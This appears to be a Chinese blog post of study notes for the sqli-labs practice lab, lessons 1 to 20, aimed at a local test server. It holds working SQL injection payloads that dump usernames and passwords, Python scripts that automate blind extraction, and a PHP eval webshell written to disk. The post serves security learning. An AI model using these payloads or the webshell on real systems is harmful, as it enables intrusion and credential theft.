sqli-labs学习笔记(基础篇)

sqli-labs学习笔记(基础篇)

目录

less-1 单引号

GET-Error based-Single quotes-String

后台语句:

SELECT * FROM users WHERE id='$id' LIMIT 0,1

判断:1'

use near ''1'' LIMIT 0,1' at line 1

正常:1' and 1=1%23

错误:1' and 1=2%23

确定列数:1' order by 3%23

爆数据库名:-1' union select 1,database(),3%23

爆表名:-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23

爆列名:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23

爆数据:-1' union select 1,group_concat(password),3 from security.users%23

less-2 无引号

GET-Error based-Intiger based

后台语句:

SELECT * FROM users WHERE id=$id LIMIT 0,1

判断:1'

use near '' LIMIT 0,1' at line 1

正常:1 and 1=1%23

错误:1 and 1=2%23

确定列数:1 order by 3%23

爆数据库名:-1 union select 1,database(),3%23

爆表名:-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23

爆列名:-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23

爆数据:-1 union select 1,group_concat(password),3 from security.users%23

less-3 括号加引号

GET-Error based-Single quotes with twist-string

后台语句:

SELECT * FROM users WHERE id=('$id') LIMIT 0,1

判断:1'

use near ''1'') LIMIT 0,1' at line 1

正常:1') and 1=1%23

错误:1') and 1=2%23

确定列数:1') order by 3%23

爆数据库名:-1') union select 1,database(),3%23

爆表名:-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23

爆列名:-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23

爆数据:-1') union select 1,group_concat(password),3 from security.users%23

less-4 括号

GET-Error based-Double Quotes-String

后台语句:

SELECT * FROM users WHERE id=($id) LIMIT 0,1

判断:1"

use near '"1"") LIMIT 0,1' at line 1

正常:1") and 1=1%23

错误:1") and 1=2%23

确定列数:1") order by 3%23

爆数据库名:-1") union select 1,database(),3%23

爆表名:-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23

爆列名:-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23

爆数据:-1") union select 1,group_concat(password),3 from security.users%23

less-5 单引号布尔盲注

GET-Double Injection-Single Quotes-String

后台语句:

SELECT * FROM users WHERE id='$id' LIMIT 0,1

判断:1'

use near ''1'' LIMIT 0,1' at line 1

正常:1' and 1=1%23 -> You are in...........

错误:1' and 1=2%23 -> 无回显

编写exp:

import requests


url = "http://127.0.0.1/sqli-labs-master/Less-5/?id="
result = ""
for i in range(1,50):
	for j in range(95,128):
		a = chr(j)
		payload ="1' and (select substr(database(),{},1) = '{}')-- +".format(i,a)
		html = requests.get(url+payload)
		print(i,j,":")
		print(url+payload)
		if "You" in html.text:
			result = result + chr(j)
			break
	print(result)
print("flag: " ,result)

# 1' and (select substr(database(),{},1) = '{}')-- + 数据库名
# 1' and (select substr(group_concat(table_name),{},1) from information_schema.tables where table_schema='security') ='{}'-- + 表名
# 1' and (select substr(group_concat(column_name),{},1) from information_schema.columns where table_name='users') ='{}'-- + 列名
# 1' and substr((select password from security.users limit 0,1),{},1)='{}'-- + 值

less-6 双引号布尔盲注

GET-Double Injection-Double Quotes-String

后台语句:

SELECT * FROM users WHERE id="$id" LIMIT 0,1

报错:1"

use near '"1"" LIMIT 0,1' at line 1

正常:1" and 1=1%23 -> You are in...........

错误:1" and 1=2%23 -> 无回显

更改exp:

# 1" and (select substr(database(),{},1) = '{}')-- + 数据库名
# 1" and (select substr(group_concat(table_name),{},1) from information_schema.tables where table_schema='security') ='{}'-- + 表名
# 1" and (select substr(group_concat(column_name),{},1) from information_schema.columns where table_name='users') ='{}'-- + 列名
# 1" and substr((select password from security.users limit 0,1),{},1)='{}'-- + 值

less-7 写shell

GET-Dump into outfile-String

修改权限:路径:phpstudy\PHPTutorial\MySQL\my.ini

secure_file_priv =(没有直接添加即可)

后台语句:

SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1

写shell:

1')) union select 1,2,"<?php @eval($_POST['cmd']);?>" into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\sqli-labs-master\\Less-7\\test.php" --+

会报错但是查看文件夹写入成功

less-8 无报错的布尔盲注

GET-Blind-Boolian Based-Single Quotes

后台语句:

SELECT * FROM users WHERE id='$id' LIMIT 0,1

判断:1"

正常:1' and 1=1%23 -> You are in...........

错误:1' and 1=2%23 -> 无回显

直接使用less-5的exp即可

less-9 单引号时间盲注

GET-Blind-time based-Single Quotes

后台语句:

SELECT * FROM users WHERE id='$id' LIMIT 0,1

判断:1' and if(1=0,1, sleep(5)) --+

编写exp:

# coding:utf-8
import requests
import datetime
import time

name = ''
for j in range(1, 9):
    for i in '0123456789abcdefghijklmnopqrstuvwxyz':
        url = '''http://127.0.0.1/sqli-labs-master/Less-9/?id='''
        payload = '''1' and if(substr(database(),%d,1)='%s',sleep(3),1)''' % (j, i)
        # print(url+payload+'%23')
        time1 = datetime.datetime.now()
        r = requests.get(url + payload + '%23')
        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec > 2:
            name += i
            print(name)
            break
    print('database_name:', name)

less-10 双引号时间盲注

GET-Blind-Time based-double quotes

后台语句:

SELECT * FROM users WHERE id='$id' LIMIT 0,1

判断:1" and if(1=0,1, sleep(5)) --+

编写exp:

# coding:utf-8
import requests
import datetime
import time

name = ''
for j in range(1, 9):
    for i in '0123456789abcdefghijklmnopqrstuvwxyz':
        url = '''http://127.0.0.1/sqli-labs-master/Less-9/?id='''
        payload = '''1" and if(substr(database(),%d,1)='%s',sleep(3),1)''' % (j, i)
        # print(url+payload+'%23')
        time1 = datetime.datetime.now()
        r = requests.get(url + payload + '%23')
        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec > 2:
            name += i
            print(name)
            break
    print('database_name:', name)

less-11 单引号POST注入

POST-Error Based-Single quotes-String

后台语句:

SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1

判断:admin' & 123

use near '123' LIMIT 0,1' at line 1

确定列数:admin' order by 2#

爆数据库名:-admin' union select 1,database()#

爆表名:-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

爆列名:-admin' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

爆数据:-admin' union select 1,group_concat(password) from security.users#

( 因为#号过滤了后面的内容,所以密码均任意即可)

less-12 双引号POST注入

POST-Error Based-Double quotes-String-with twist

后台语句:

SELECT username, password FROM users WHERE username=("$uname") and password=("$passwd") LIMIT 0,1

(实际无法这么写,本文此种写法是为了简洁,意思相同)

判断:admin" & 123

use near '123") LIMIT 0,1' at line 1

确定列数:admin") order by 2#

爆数据库名:-admin") union select 1,database()#

爆表名:-admin") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

爆列名:-admin") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

爆数据:-admin") union select 1,group_concat(password) from security.users#

( 因为#号过滤了后面的内容,所以密码均任意即可)

less-13 单引号报错注入

POST-Double Injection-Single quotes-String-with twist

基本情况:只有报错,无其他任何回显

后台语句:

SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1

(实际无法这么写,本文此种写法是为了简洁,意思相同)

判断:admin' & 123

use near '123') LIMIT 0,1' at line 1

确定列数:admin') order by 2#

爆数据库名:1')||updatexml(1,concat(0x7e,(select database()),0x7e),1)#

爆表名:1')||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

爆列名:1')||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)="users")),1))#

爆数据:1')||(updatexml(1,concat(0x7e,(select(group_concat(password))from(users))),1))#

1')||(updatexml(1,concat(0x7e,(mid((select(group_concat(password))from(users)),32))),1))#

( 因为#号过滤了后面的内容,所以密码均任意即可)

less-14 双引号报错注入

POST-Double Injection-Single quotes-String-with twist

基本情况:只有报错,无其他任何回显

后台语句:

SELECT username, password FROM users WHERE username="$uname" and password="$passwd" LIMIT 0,1

(实际无法这么写,本文此种写法是为了简洁,意思相同)

判断:admin" & 123

use near '123" LIMIT 0,1' at line 1

确定列数:admin') order by 2#

爆数据库名:1"||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

爆表名:1"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)="users")),1))#

爆列名:1"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)="users")),1))#

爆数据:1"||(updatexml(1,concat(0x7e,(select(group_concat(password))from(users))),1))#

1"||(updatexml(1,concat(0x7e,(mid((select(group_concat(password))from(users)),32))),1))#

( 因为#号过滤了后面的内容,所以密码均任意即可)

less-15 POST时间盲注

POST-Blind-BOOlian/time Based-Single quotes

无任何回显

后台语句:

SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1

编写exp:

#coding=utf-8

import requests
import time

name=""
url="http://127.0.0.1/sqli-labs-master/Less-15/"
headers={
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
'Host': 'localhost'
}
currentTime=time.time()

for i in range(1,20):
    for j in range(32,128):
        payload=" and if(left(database(),%d)='%s',sleep(4),null)#"%(i,name+chr(j))
        data={
            "uname":"admin'"+payload,
            "passwd":"123",
            "submit":"Submit"
            }
        starttime=time.time()
        name1=requests.post(url,data=data,headers=headers)
        if time.time()-starttime>=3:
            name+=chr(j)
            print(j)
            break
finishTime=time.time()
print("[+]一共使用了"+str(finishTime-currentTime)+"s")
print("[+]数据库名字:"+name)

less-16 POST时间盲注

POST-Blind-BOOlian/time Based-Double quotes

无其他任何回显

后台语句:

SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1

单引号换成双引号即可

less-17 update注入

POST-Update Query-Error Based-String

基本情况:对用户名进行过滤,且查询时写死,无法绕过

后台语句:

UPDATE users SET password = '$passwd' WHERE username='$row1'

判断:admin & 1\

use near 'admin'' at line 1

爆数据库名:1'||updatexml(1,concat(0x7e,(select database()),0x7e),1)#

爆表名:1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

爆列名:1'||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)="users")),1))#

爆数据:1'||updatexml(1,concat(0x7e,(select(group_concat(password))from(select(password)from(users))t),0x7e),1)#

1'||updatexml(1,concat(0x7e,mid((select(group_concat(password))from(select(password)from(users))t),32),0x7e),1)#

(不能依据某字段值做判断再来更新某字段的值,将SELECT出的结果再通过中间表SELECT一遍)

less-18 insert注入

POST-Header Injection-Uagent field-Error based

后台语句:

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)

爆数据库名:1'&&updatexml(1,concat(0x7e,(select(database())),0x7e),1)and'1'='1

爆表名:1'&&updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)and'1'='1

爆列名:1'&&updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")),0x7e),1)and'1'='1

爆数据:1'&&updatexml(1,concat(0x7e,(select(group_concat(password))from(select(password)from(users))t),0x7e),1)and'1'='1

1'&&updatexml(1,concat(0x7e,mid((select(group_concat(password))from(select(password)from(users))t),32),0x7e),1)and'1'='1

less-19 insert注入

POST-Header Injection-Referer field-Error based

后台语句:

INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')

爆数据库名:1'&&updatexml(1,concat(0x7e,(select(database())),0x7e),1)and'1'='1

爆表名:1'&&updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)and'1'='1

爆列名:1'&&updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")),0x7e),1)and'1'='1

爆数据:1'&&updatexml(1,concat(0x7e,(select(group_concat(password))from(select(password)from(users))t),0x7e),1)and'1'='1

1'&&updatexml(1,concat(0x7e,mid((select(group_concat(password))from(select(password)from(users))t),32),0x7e),1)and'1'='1

less-20 cookie注入

POST-Cookie Injections-Uagent field-error based

后台语句:

SELECT * FROM users WHERE username='$cookee' LIMIT 0,1

爆数据库名:1'&&updatexml(1,concat(0x7e,(select(database())),0x7e),1)and'1'='1

爆表名:1'&&updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)and'1'='1

爆列名:1'&&updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")),0x7e),1)and'1'='1

爆数据:1'&&updatexml(1,concat(0x7e,(select(group_concat(password))from(select(password)from(users))t),0x7e),1)and'1'='1

1'&&updatexml(1,concat(0x7e,mid((select(group_concat(password))from(select(password)from(users))t),32),0x7e),1)and'1'='1

总结

适用范围:

注入类型 适用范围 可能包含的源码
联合注入 输出查询结果 echo 'Your Login name:'. $row['username'];
报错注入 输出报错结果 print_r(mysql_error());
布尔盲注 执行正确和错误回显不同 if($row){echo a}else{echo b}
时间盲注 执行正确和错误时间不同 if($row){echo a}else{echo a}
写shell 无回显 正常语句
posted @ 2020-12-28 18:40  kar3a  阅读(586)  评论(0编辑  收藏  举报